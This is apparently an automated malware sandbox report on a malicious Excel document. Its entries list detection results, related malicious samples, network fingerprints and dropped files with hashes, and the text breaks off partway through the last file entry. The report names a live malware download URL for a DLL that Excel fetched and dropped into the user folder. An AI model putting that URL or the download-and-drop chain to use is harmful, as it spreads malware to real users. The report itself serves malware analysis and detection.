                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.expl.evad.winXLS@7/12@1/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 21.2% (good quality ratio 19.9%)
                                                    • Quality average: 76.5%
                                                    • Quality standard deviation: 30.3%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .xls
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, WerFault.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 8.253.207.121, 8.241.83.126, 8.241.89.254, 8.238.85.126, 8.238.85.254, 23.0.174.193, 23.0.174.185, 23.0.174.187
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    18:47:17API Interceptor26x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUSvniSIKfm4h.dllGet hashmaliciousBrowse
                                                    • 104.20.184.68
                                                    61mwzdX4GC.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    WbQrxxnmAO.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    msals.pumpl.dllGet hashmaliciousBrowse
                                                    • 104.20.184.68
                                                    234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    items list.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    Nickha #U0421#U0430ll Notification.mp3.htmGet hashmaliciousBrowse
                                                    • 172.67.156.94
                                                    SKMC25832100083932157.jarGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    SecuriteInfo.com.Malware.AI.4002960471.16400.exeGet hashmaliciousBrowse
                                                    • 104.22.18.188
                                                    aunobp.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    StolenImages_Evidence.jsGet hashmaliciousBrowse
                                                    • 172.67.193.97
                                                    Inquiry 040721_pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.35.249
                                                    SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Invoice copyt2.ppsGet hashmaliciousBrowse
                                                    • 172.67.178.43
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.35.175
                                                    shipping documents.exeGet hashmaliciousBrowse
                                                    • 172.67.161.182
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.35.175
                                                    EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    46578-TR.exeGet hashmaliciousBrowse
                                                    • 172.67.160.218
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    AMAZON-02UScomprobante de pago bancario.exeGet hashmaliciousBrowse
                                                    • 44.227.76.166
                                                    TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                    • 3.13.255.157
                                                    shipping documents.exeGet hashmaliciousBrowse
                                                    • 3.14.206.30
                                                    Export Invoices_&Packing List.exeGet hashmaliciousBrowse
                                                    • 65.1.51.136
                                                    U49nsX8zQr.exeGet hashmaliciousBrowse
                                                    • 3.142.167.54
                                                    LGKacQbjeH.exeGet hashmaliciousBrowse
                                                    • 3.22.15.135
                                                    GvqwXsjgUm.apkGet hashmaliciousBrowse
                                                    • 65.9.73.55
                                                    GvqwXsjgUm.apkGet hashmaliciousBrowse
                                                    • 65.9.73.104
                                                    payment.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    BL836477488575.exeGet hashmaliciousBrowse
                                                    • 3.13.255.157
                                                    SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                    • 34.240.216.169
                                                    taiwan.exeGet hashmaliciousBrowse
                                                    • 13.230.203.251
                                                    Order.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    BL84995005038483.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    Certrificate Confirmation.exeGet hashmaliciousBrowse
                                                    • 3.14.206.30
                                                    PO91361.exeGet hashmaliciousBrowse
                                                    • 52.58.78.16
                                                    DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                    • 44.227.76.166
                                                    FARASIS.xlsxGet hashmaliciousBrowse
                                                    • 52.218.57.50
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 143.204.3.74
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 143.204.3.74

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    7dcce5b76c8b17472d024758970a406b8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Invoice copyt2.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Invoice copy.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Scan emco Bautechni specification.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Notice-039539.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1245492889.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    Notice-039539.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    PO#070421APRIL-REV.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1251000362.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    FARASIS.xlsxGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    NEW LEMA PO 652872-21.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1055791644.xlsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    final po PP-11164.pptGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    OrderSheet.ppsGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    document-1848152474.xlsmGet hashmaliciousBrowse
                                                    • 104.21.3.47
                                                    eb88d0b3e1961a0562f006e5ce2a0b87document-1774544026.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Sales_Receipt 8723_xls.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Sales_Receipt 5576.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt 1726.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    invoice.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Doc_841213_7440493012242.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    sample20210331-01.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt 4153.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Q60T94coCp.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt 6364.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Purchase_Order 1440.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    document-1223674862.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    document-585033175.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Payment_Receipt_0624.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    SecuriteInfo.com.Heur.21995.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    Sales_receipt_639498456-001.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    sample20210324-01.xlsGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    OUTSTANDING_INVOICE_Statement_077117.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    OUTSTANDING_INVOICE_Statement_112488.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186
                                                    OUTSTANDING_INVOICE_Statement_655533.xlsmGet hashmaliciousBrowse
                                                    • 52.12.4.186

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):58596
                                                    Entropy (8bit):7.995478615012125
                                                    Encrypted:true
                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):326
                                                    Entropy (8bit):3.11466556781601
                                                    Encrypted:false
                                                    SSDEEP:6:kKPllkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:HMwTJrkPlE99SNxAhUe0ht
                                                    MD5:DAE73406F57ACCA13A6BCA741457638D
                                                    SHA1:92EDB28B1A2B8774BB853F3A51BB2E84D1943EDE
                                                    SHA-256:09A4D2C168D63F22CD3514838B2E8F034DB2B2D3F3EBA013789AAAC0AA35F9F8
                                                    SHA-512:A39B85375E1314F9827E3499528C2DF36C73AE6D181CCA529E0CC69C50481CC0848DEC4FD13F07663DAED2A916A23663A460241970DDA07A8BC3529B1A66A4CE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: p...... ..........6:.,..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):1058304
                                                    Entropy (8bit):6.53535499133489
                                                    Encrypted:false
                                                    SSDEEP:24576:5hHy+lLB10y0hvDP3PnlFnIOAVMeuaBAvRSM4eja:5hJl9N0hrHnlFnIOADAvRYB
                                                    MD5:C5DF0AA6752CBADA9CC1461F1AE6B64C
                                                    SHA1:17C84C667875594B0285B7412D0BE37FD05CD504
                                                    SHA-256:997428256801049343CE5926CE4652FA0D74E4AB6A93C809C8CC385DEC620123
                                                    SHA-512:21E383BFC558F0B05239A00DE59AD99F631226533AFC9D73F251EEA26754936931BF19BE7F9945800702AA4CDB5AFEC503740AA40AD72E9C96FC72E0DB943A7D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Reputation:low
                                                    IE Cache URL:https://whiskyexpanse.com/ke/ohior.dll
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E.........E.......E.......E.............................m........6...T......T......T......T......Rich...........PE..L...X.\...........!.....8...........D.......P.......................................=....@.........................`z.......z..d........v.......................k......T...............................@............P..,............................text...C7.......8.................. ..`.rdata..F>...P...@...<..............@..@.data................|..............@....rsrc....v.......x...B..............@..@.reloc...k.......l..................@..B........................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\B3EE0000
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):82208
                                                    Entropy (8bit):7.883359597711546
                                                    Encrypted:false
                                                    SSDEEP:1536:yaC1JJ7BoQHbAr6AeW1eYbWZwHYvTS1Ru0qyCfQijWGHpM1Q:yaCnJqr6cbWZw4bSjveQijW2pM1Q
                                                    MD5:6932B145DDB6922457DA77263FD1754E
                                                    SHA1:3D8AB07403F7EDB6B309C13D7F87B2DBB4B58C01
                                                    SHA-256:48910B4E3DDAAE28D6C18E6F812D95019A41B7F3FF6D5336FA2CB96F04849670
                                                    SHA-512:AE33AB7EB2727286E24E77760F41CC52C8496366E1101368CE34A568C6589033C183711595E66F67CC2AA759E266386B44592287E35DC0178482F9A73A109E71
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: .U]O.0.}.....uJ\....)..{.$....Mb._....~.N. *M#.K>.{.=v....V... ...Y. ..n.4mM....?H."3.)k.&[..r....~. ..6.&]..'..w.Y....3...E|.-u.oX..|.....&.1. ..oh...U...gZR...KT5.:..8=.XK3B0..,bk.....6.. ,..(........ZU.K... F.".....q.*.2....A..hB.........t.....C.y..k......K..-..it...>[.Y[....Iv.PB.AU.J3..ak.8.yQx.)#....(.n..+.:.'td.s..{...Ks~B..@....D......-.../..pB/s..Pt..c..].@h?]....:.g.I..=|..].c........a../...B.}v.J.=#f.|.Q.C:P....4.`.........PK..........!.!..A............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\CabD146.tmp
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):58596
                                                    Entropy (8bit):7.995478615012125
                                                    Encrypted:true
                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                    C:\Users\user\AppData\Local\Temp\TarD147.tmp
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):152788
                                                    Entropy (8bit):6.309740459389463
                                                    Encrypted:false
                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Apr 8 00:46:43 2021, atime=Thu Apr 8 00:46:43 2021, length=8192, window=hide
                                                    Category:dropped
                                                    Size (bytes):867
                                                    Entropy (8bit):4.474905640580116
                                                    Encrypted:false
                                                    SSDEEP:12:85QPLgXg/XAlCPCHaXtB8XzB/pUX+WnicvbCbDtZ3YilMMEpxRljKvUTdJP9TdJ2:85Y/XTd6jYYeyDv3qdrNru/
                                                    MD5:951A0E0CB8606EEF33219F64F47BDA04
                                                    SHA1:99E33BDC3EFDFD8E507BACC21FD736459F072583
                                                    SHA-256:F7B98730EF7D1FA92877BF3343D3031272AC398E2351DC23A28918D1A671C159
                                                    SHA-512:0AE4233FE581EB8F4D1EF632BB8A4CAD166FFB65B47889F796C6EFA92168037DEADB08AAD6D82AA0DC5861E186AEE620B9990758E515D89FEF8674F215F1D588
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: L..................F...........7G..+.1..,..+.1..,... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......367706..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_460000622_1464906353.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Thu Apr 8 00:46:43 2021, atime=Thu Apr 8 00:46:43 2021, length=115712, window=hide
                                                    Category:dropped
                                                    Size (bytes):2228
                                                    Entropy (8bit):4.516452407405915
                                                    Encrypted:false
                                                    SSDEEP:48:8v/XT0jFQaP1d+8dQh2v/XT0jFQaP1d+8dQ/:8v/XojFQUThdQh2v/XojFQUThdQ/
                                                    MD5:90FB6C5F59725EA0D24D18D091040BBC
                                                    SHA1:004673E5C653BADB46406B4C5D5DD246614A8D0A
                                                    SHA-256:AECEB49FB09A71238F3153457F683A2821D5B598F3000C3B04B0287125B1A6E5
                                                    SHA-512:68D91C78D7848FD7ACF3CD96FE82D6CC7141D5BF0369FE7597AFDB5B2215FFF22B8B7167AC66ECCEBC009F7D30FCE26DA811D6C2B455B4D7DC42E2288D397CEA
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: L..................F.... ....M...{..+.1..,...p=..,...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..t...R.. .DOCUME~1.XLS..r.......Q.y.Q.y*...8.....................D.o.c.u.m.e.n.t.s._.4.6.0.0.0.0.6.2.2._.1.4.6.4.9.0.6.3.5.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\Documents_460000622_1464906353.xls.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.4.6.0.0.0.0.6.2.2._.1.4.6.4.9.0.6.3.5.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):143
                                                    Entropy (8bit):4.652162523364624
                                                    Encrypted:false
                                                    SSDEEP:3:oyBVomMU9RTDXvbkTGXC5S/9RTDXvbkTGXCmMU9RTDXvbkTGXCv:dj6C1n7ASl1n7UC1n7s
                                                    MD5:A5C1694C63A4C40F758FAC46C375CFC4
                                                    SHA1:09CDCEEAAD5508225FFACCD2F7C99CEC1A5E85EB
                                                    SHA-256:21350610F2A79F94FC49E80087B5F2105A57A71DD2781532E08CB037A1D20D09
                                                    SHA-512:22A7F91BA27C4C46483F134973FE8D2E2607A634AA8C688C3BD9C04C3089744D8F161268214A7F0057AABDB310194C7A18664B1A293E68D907E119BBDED906C0
                                                    Malicious:false
                                                    Preview: Desktop.LNK=0..[xls]..Documents_460000622_1464906353.LNK=0..Documents_460000622_1464906353.LNK=0..[xls]..Documents_460000622_1464906353.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4MFCXH41.txt
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):118
                                                    Entropy (8bit):4.5708003640240715
                                                    Encrypted:false
                                                    SSDEEP:3:GmM/OeByDE11R1UTpI96OcAdV1uGTKvcSNzivVddw9QzS5/:XM/w8qTpQd2GTlLVddAoS5/
                                                    MD5:F081DDF03B7C946C0CC4C88EE9401E65
                                                    SHA1:E484164F0407597634D03904FBE7196F0E8308EB
                                                    SHA-256:AA4FF36CF14812E6C35F2C5BC766F2B43C6AE93008B622CAD49E72B617300023
                                                    SHA-512:2084C0A9BECFD190009DA633239F7FFBF1B3A031AF40C353B7E081D0C6EBC119BA4A510A073F52B76664C5908E3BBE4FC59212D0FC43392BCC5389F27406F8D0
                                                    Malicious:false
                                                    IE Cache URL:whiskyexpanse.com/
                                                    Preview: __cfduid.d12fd379ff8b296fa7718ea14c16458e21617814039.whiskyexpanse.com/.9728.2763359616.30884704.132854913.30878745.*.
                                                    C:\Users\user\Desktop\54EE0000
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Applesoft BASIC program data, first line number 16
                                                    Category:dropped
                                                    Size (bytes):164316
                                                    Entropy (8bit):6.404543028003528
                                                    Encrypted:false
                                                    SSDEEP:3072:eF8rmdAItyzElBIL6lECbgBGGP5xLm7Tjw5bSjze2iNW2MmtJI7QExMmtiEUEoFG:48rmdAItyzElBIL6lECbgBvP5Nm7Tjwc
                                                    MD5:45F873A63562D99B6CCC3CCA80975936
                                                    SHA1:C84FC25F4EE80B0C195F5C710FDBAD7B65070EFE
                                                    SHA-256:D9F09747AC993C5DF93BE887764D79C2456C67AAD6B7FA078C9DF0A471319C34
                                                    SHA-512:38689D95BEDE8C9D436189EADBBD6E96F94FB5AAEFADA553188500E2BD08713280E93AD0DDE20C2991432F3B99D50CC4244B3E9C9EB336B0DD062F87865BD149
                                                    Malicious:false
                                                    Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                                                    C:\Users\user\ndgfht.frg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1058304
                                                    Entropy (8bit):6.53535499133489
